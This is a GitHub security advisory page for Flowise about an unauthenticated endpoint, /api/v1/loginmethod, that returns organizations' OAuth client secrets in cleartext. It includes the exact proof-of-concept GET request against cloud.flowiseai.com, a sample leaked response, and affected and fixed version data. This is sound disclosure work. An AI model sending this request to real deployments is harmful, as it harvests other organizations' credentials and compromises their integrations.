GHSA-6PCV-J4JX-M4VX

Vulnerability from github – Published: 2026-04-16 21:20 – Updated: 2026-04-16 21:20
VLAI?
Summary
Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request
Details

Summary

I have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.

PoC

The following request can be sent by anyone on the internet without any cookies or authorization headers.

Request

GET /api/v1/loginmethod?organizationId=<any_organization_id> HTTP/2
Host: cloud.flowiseai.com
Accept: application/json
Content-Type: application/json

Response: The server returns 200 OK with sensitive credentials:

{
  "providers": [
    {
      "id": "a04ba769-b810-481d-8d6b-84f8c377dea5",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "azure",
      "config": {
        "tenantID": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "eda8bd90-1c45-4aca-933f-3a53d9be4161",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "google",
      "config": {
        "clientID": "123455",
        "clientSecret": "123455"
      },
      "status": "enable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "0d238df0-c89c-4733-bf57-6ec06f58c7e7",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "auth0",
      "config": {
        "domain": "",
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    },
    {
      "id": "e060ae88-c7f4-4b7c-9bdc-5321963a1648",
      "organizationId": "bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d",
      "name": "github",
      "config": {
        "clientID": "",
        "clientSecret": ""
      },
      "status": "disable",
      "createdDate": "2025-12-26T18:52:33.453Z",
      "updatedDate": "2025-12-26T19:31:56.087Z",
      "createdBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2",
      "updatedBy": "6ab311fa-0d0a-4bd6-996e-4ae721377fb2"
    }
  ],
  "callbacks": [
    {
      "providerName": "azure",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/azure/callback"
    },
    {
      "providerName": "google",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/google/callback"
    },
    {
      "providerName": "auth0",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/auth0/callback"
    },
    {
      "providerName": "github",
      "callbackURL": "https://cloud.flowiseai.com/api/v1/github/callback"
    }
  ]
}

Affected Deployments

  • FlowiseAI Cloud (cloud.flowiseai.com)
  • Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed

Impact

An unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization's third-party integrations and potential data breaches.

Severity ?
5.3 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-306",
      "CWE-312"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:20:05Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\nI have discovered a critical Missing Authentication vulnerability on the /api/v1/loginmethod endpoint. The API allows unauthenticated users (guests) to retrieve the full SSO configuration of any organization by simply providing an organizationId. The response includes sensitive OAuth credentials (Client Secrets) in cleartext.\n\n\n### PoC\nThe following request can be sent by anyone on the internet without any cookies or authorization headers.\n\nRequest\n```http\nGET /api/v1/loginmethod?organizationId=\u003cany_organization_id\u003e HTTP/2\nHost: cloud.flowiseai.com\nAccept: application/json\nContent-Type: application/json\n```\n\nResponse: The server returns 200 OK with sensitive credentials:\n```json\n{\n  \"providers\": [\n    {\n      \"id\": \"a04ba769-b810-481d-8d6b-84f8c377dea5\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"azure\",\n      \"config\": {\n        \"tenantID\": \"\",\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": \"eda8bd90-1c45-4aca-933f-3a53d9be4161\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"google\",\n      \"config\": {\n        \"clientID\": \"123455\",\n        \"clientSecret\": \"123455\"\n      },\n      \"status\": \"enable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": \"0d238df0-c89c-4733-bf57-6ec06f58c7e7\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"auth0\",\n      \"config\": {\n        \"domain\": \"\",\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    },\n    {\n      \"id\": \"e060ae88-c7f4-4b7c-9bdc-5321963a1648\",\n      \"organizationId\": \"bd2b74e0-e0cd-4bb5-ba98-3cc2ae683d5d\",\n      \"name\": \"github\",\n      \"config\": {\n        \"clientID\": \"\",\n        \"clientSecret\": \"\"\n      },\n      \"status\": \"disable\",\n      \"createdDate\": \"2025-12-26T18:52:33.453Z\",\n      \"updatedDate\": \"2025-12-26T19:31:56.087Z\",\n      \"createdBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\",\n      \"updatedBy\": \"6ab311fa-0d0a-4bd6-996e-4ae721377fb2\"\n    }\n  ],\n  \"callbacks\": [\n    {\n      \"providerName\": \"azure\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/azure/callback\"\n    },\n    {\n      \"providerName\": \"google\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/google/callback\"\n    },\n    {\n      \"providerName\": \"auth0\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/auth0/callback\"\n    },\n    {\n      \"providerName\": \"github\",\n      \"callbackURL\": \"https://cloud.flowiseai.com/api/v1/github/callback\"\n    }\n  ]\n}\n```\n### Affected Deployments\n- FlowiseAI Cloud (cloud.flowiseai.com)\n- Self-hosted FlowiseAI instances where the /api/v1/loginmethod endpoint is exposed\n\n### Impact\nAn unauthenticated attacker can harvest sensitive API secrets (Google, Microsoft, GitHub Client Secrets) from any organization on the cloud platform. This leads to complete compromise of the organization\u0027s third-party integrations and potential data breaches.",
  "id": "GHSA-6pcv-j4jx-m4vx",
  "modified": "2026-04-16T21:20:05Z",
  "published": "2026-04-16T21:20:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-6pcv-j4jx-m4vx"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise: Unauthenticated Information Disclosure of OAuth Secrets (Cleartext) via GET Request"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.